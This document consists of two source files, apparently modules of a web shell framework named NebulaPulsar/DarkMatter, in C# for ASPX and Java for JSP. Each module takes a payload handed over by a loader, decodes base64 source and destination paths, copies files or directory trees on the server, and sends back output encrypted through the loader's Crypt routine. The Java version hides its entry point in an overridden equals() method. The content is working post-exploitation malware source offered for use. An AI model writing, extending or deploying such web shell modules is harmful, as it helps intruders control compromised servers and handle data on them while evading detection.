File: Payload/ASPX/NebulaPulsar/DarkMatter/file_copy.cs
using System;
using System.Web;
using System.IO;
using System.Diagnostics;
using System.Text;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Threading;

public class file_copy
{
    private Dictionary<string, string> fnParseParams(string szParam)
    {
        Dictionary<string, string> dic = new Dictionary<string, string>();
        if (string.IsNullOrEmpty(szParam))
            return dic;

        string[] pairs = szParam.Split('&');
        foreach (string szPair in pairs)
        {
            int nIdx = szPair.IndexOf("=");
            if (nIdx > 0)
                dic[szPair.Substring(0, nIdx).Trim()] = szPair.Substring(nIdx + 1).Trim();
        }

        return dic;
    }

    private string fnB64Encode(string szInput) => Convert.ToBase64String(Encoding.UTF8.GetBytes(szInput));
    private string fnB64Decode(string szInput) => Encoding.UTF8.GetString(Convert.FromBase64String(szInput));

    private void fnWriteOutput(object driver, HttpResponse response, byte[] abOutput)
    {
        if (abOutput.Length == 0)
            abOutput = Encoding.UTF8.GetBytes("DARKMATTER_SUCCESS: Action executed but returned no output");

        byte[] abEncryptedResp = abOutput;
        if (driver != null)
        {
            try
            {
                var cryptMethod = driver.GetType().GetMethod("Crypt", new Type[] { typeof(byte[]), typeof(int) });
                if (cryptMethod != null)
                {
                    abEncryptedResp = (byte[])cryptMethod.Invoke(driver, new object[] { abOutput, 1 });
                }
            }
            catch (Exception) { }
        }

        response.Clear();
        response.ContentType = "application/octet-stream";
        response.StatusCode = 200;
        response.BinaryWrite(abEncryptedResp);
        response.Flush();
    }

    private void fnCopyRecursive(string sourceDir, string targetDir)
    {
        Directory.CreateDirectory(targetDir);

        foreach (string file in Directory.GetFiles(sourceDir))
        {
            string fileName = Path.GetFileName(file);
            string destFile = Path.Combine(targetDir, fileName);
            File.Copy(file, destFile, true);
        }

        foreach (string directory in Directory.GetDirectories(sourceDir))
        {
            string dirName = Path.GetFileName(directory);
            string destDir = Path.Combine(targetDir, dirName);
            fnCopyRecursive(directory, destDir);
        }
    }

    private string fnMain(string szSrcPath, string szDstPath)
    {
        if (!Directory.Exists(szSrcPath) && !File.Exists(szSrcPath))
        {
            return "0|Source does not exist.";
        }
        else if (Directory.Exists(szDstPath) || File.Exists(szDstPath))
        {
            return "0|Destination already exists.";
        }
        else
        {
            try
            {
                FileAttributes attr = File.GetAttributes(szSrcPath);
                if ((attr & FileAttributes.Directory) == FileAttributes.Directory)
                {
                    fnCopyRecursive(szSrcPath, szDstPath);
                }
                else
                {
                    string dstParent = Path.GetDirectoryName(szDstPath);
                    if (!string.IsNullOrEmpty(dstParent) && !Directory.Exists(dstParent))
                    {
                        Directory.CreateDirectory(dstParent);
                    }
                    File.Copy(szSrcPath, szDstPath, true);
                }
                return "1|";
            }
            catch (Exception ex)
            {
                return "0|Error: " + ex.Message;
            }
        }
    }

    public bool Run()
    {
        HttpContext context = HttpContext.Current;
        if (context == null)
            return false;

        HttpRequest request = context.Request;
        HttpResponse response = context.Response;
        object driver = context.Items["driver"];

        try
        {
            byte[] abPayload = (byte[])context.Items["payload"];
            object objLength = context.Items["len"];

            if (abPayload == null || objLength == null)
            {
                response.Write("PAYLOAD_ERROR: Missing attributes from request.");
                return true;
            }

            int nDllLength = Convert.ToInt32(objLength.ToString());
            int nParamOffset = nDllLength + 4;
            int nParamLength = abPayload.Length - nParamOffset;
            string szParam = Encoding.UTF8.GetString(abPayload, nParamOffset, nParamLength).Trim();

            Dictionary<string, string> dic = fnParseParams(szParam);

            string szSrcPath = fnB64Decode(dic["z0"]);
            string szDstPath = fnB64Decode(dic["z1"]);

            string result = fnMain(szSrcPath, szDstPath);
            fnWriteOutput(driver, response, Encoding.UTF8.GetBytes(result));
        }
        catch (Exception ex)
        {
            try
            {
                response.Write("DARKMATTER_INTERNAL_CRASHED: " + ex.ToString());
            }
            catch (Exception) { }
        }

        return true;
    }
}

File: Payload/JSP/NebulaPulsar(Java 8)/file_copy.java
import java.io.*;
import java.lang.reflect.Method;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
import java.nio.charset.StandardCharsets;
import java.nio.file.*;

public class file_copy extends ClassLoader
{
    public file_copy(ClassLoader objParent) { super(objParent); }
    public file_copy() { super(file_copy.class.getClassLoader()); }

    private Map<String, String> fnParseParams(String szParamStr)
    {
        Map<String, String> mapParams = new HashMap<String, String>();
        if (szParamStr == null || szParamStr.trim().isEmpty())
            return mapParams;

        String[] aszPairs = szParamStr.split("&");
        for (String szPair : aszPairs)
        {
            int nIdx = szPair.indexOf("=");
            if (nIdx > 0)
            {
                mapParams.put(szPair.substring(0, nIdx), szPair.substring(nIdx + 1));
            }
        }
        return mapParams;
    }

    private void fnWriteOutput(Object objParam, Object objResponse, OutputStream osClient, byte[] abResult)
    {
        if (abResult.length == 0)
            abResult = "DARKMATTER_SUCCESS: Action executed but returned no output".getBytes();

        Object objPageContext = objParam;

        try
        {
            byte[] abEncryptedResult = Encrypt(objParam, abResult);
            osClient.write(abEncryptedResult);
            osClient.flush();

            Method fnSetStatus = objResponse.getClass().getMethod("setStatus", new Class[]{int.class});
            fnSetStatus.invoke(objResponse, new Object[]{200});

            try
            {
                Method fnGetOut = objPageContext.getClass().getMethod("getOut", new Class[0]);
                Object objOut = fnGetOut.invoke(objPageContext, new Object[0]);
                Method fnClear = objOut.getClass().getMethod("clear", new Class[0]);
                fnClear.invoke(objOut, new Object[0]);
            }
            catch (Exception exIgnored) {}

            Method fnFlushBuffer = objResponse.getClass().getMethod("flushBuffer", new Class[0]);
            fnFlushBuffer.invoke(objResponse, new Object[0]);
        }
        catch (Exception exIgnored) {}
    }

    private byte[] Encrypt(Object objPageContext, byte[] abRawResponse)
    {
        try
        {
            if (objPageContext == null)
                return abRawResponse;

            Method fnGetRequest = objPageContext.getClass().getMethod("getRequest", new Class[0]);
            Object objRequest = fnGetRequest.invoke(objPageContext, new Object[0]);

            Method fnGetAttribute = objRequest.getClass().getMethod("getAttribute", new Class[]{String.class});
            Object objPulsarLoader = fnGetAttribute.invoke(objRequest, new Object[]{"pulsar_loader_instance"});
            
            if (objPulsarLoader == null)
                return abRawResponse;

            java.lang.reflect.Method fnCrypt = objPulsarLoader.getClass().getDeclaredMethod("Crypt", byte[].class, int.class);
            fnCrypt.setAccessible(true);

            return (byte[])fnCrypt.invoke(objPulsarLoader, abRawResponse, 1);
        }
        catch (Exception exCrashed)
        {
            return abRawResponse;
        }
    }

    private void fnCopyRecursive(File src, File dst) throws IOException
    {
        if (src.isDirectory())
        {
            if (!dst.exists())
            {
                dst.mkdirs();
            }
            String[] children = src.list();
            if (children != null)
            {
                for (String child : children)
                {
                    fnCopyRecursive(new File(src, child), new File(dst, child));
                }
            }
        }
        else
        {
            File parent = dst.getParentFile();
            if (parent != null && !parent.exists())
            {
                parent.mkdirs();
            }
            Files.copy(src.toPath(), dst.toPath(), StandardCopyOption.REPLACE_EXISTING, StandardCopyOption.COPY_ATTRIBUTES);
        }
    }

    private String fnMain(String szSrcPath, String szDstPath)
    {
        File srcFile = new File(szSrcPath);
        File dstFile = new File(szDstPath);

        if (!srcFile.exists())
        {
            return "0|Source does not exist.";
        }
        else if (dstFile.exists())
        {
            return "0|Destination already exists.";
        }
        else
        {
            try
            {
                fnCopyRecursive(srcFile, dstFile);
                return "1|";
            }
            catch (Exception ex)
            {
                return "0|Error: " + ex.getMessage();
            }
        }
    }

    @Override
    public boolean equals(Object objParam)
    {
        Object objPageContext = objParam;
        Object objRequest = null;
        Object objResponse = null;
        OutputStream osClient = null;

        try
        {
            Method fnGetRequest = objPageContext.getClass().getMethod("getRequest", new Class[0]);
            objRequest = fnGetRequest.invoke(objPageContext, new Object[0]);

            Method fnGetResponse = objPageContext.getClass().getMethod("getResponse", new Class[0]);
            objResponse = fnGetResponse.invoke(objPageContext, new Object[0]);

            Method fnGetOutputStream = objResponse.getClass().getMethod("getOutputStream", new Class[0]);
            osClient = (OutputStream) fnGetOutputStream.invoke(objResponse, new Object[0]);

            Method fnGetAttribute = objRequest.getClass().getMethod("getAttribute", new Class[]{String.class});
            Object objPayload = fnGetAttribute.invoke(objRequest, new Object[]{"payload"});
            Object objLength = fnGetAttribute.invoke(objRequest, new Object[]{"len"});

            if (objPayload == null || objLength == null)
            {
                osClient.write("PAYLOAD_ERROR: Missing attributes from request.".getBytes());
                return true;
            }

            byte[] abPayload = (byte[])objPayload;
            int nClassLength = Integer.parseInt(objLength.toString());
            int nParamOffset = nClassLength + 4;
            int nParamLength = abPayload.length - nParamOffset;
            String szParam = new String(abPayload, nParamOffset, nParamLength, "UTF-8").trim();

            Map<String, String> mapParams = fnParseParams(szParam);

            String szSrcPath = new String(Base64.getDecoder().decode(mapParams.get("z0")), StandardCharsets.UTF_8);
            String szDstPath = new String(Base64.getDecoder().decode(mapParams.get("z1")), StandardCharsets.UTF_8);

            fnWriteOutput(objParam, objResponse, osClient, fnMain(szSrcPath, szDstPath).getBytes());
        }
        catch (Exception ex)
        {
            if (osClient != null)
            {
                try
                {
                    StringWriter swTrace = new StringWriter();
                    ex.printStackTrace(new PrintWriter(swTrace));
                    osClient.write(("DARKMATTER_INTERNAL_CRASHED: " + swTrace.toString()).getBytes());
                }
                catch (Exception exIgnored) {}
            }
        }

        return true;
    }
}